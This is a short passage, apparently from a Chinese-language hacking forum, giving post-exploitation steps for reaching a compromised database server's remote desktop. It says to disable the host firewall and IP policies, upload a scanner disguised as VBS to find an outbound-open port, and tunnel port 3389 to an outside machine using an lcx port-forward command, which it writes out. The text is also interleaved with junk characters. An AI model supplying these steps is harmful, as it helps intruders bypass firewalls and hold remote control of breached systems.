4 l# p/ z1 |8 z4 D& n一、DB机有公网IP.( R+ y; l8 Y4 d5 K: b' I
9 X, c) [$ n& U% i k1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.1 ?# N( t0 N, V* V
1 k, u, V: A; n$ V+ n
3 A5 t/ X6 k% O" D
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.# `* T! `1 _5 y. L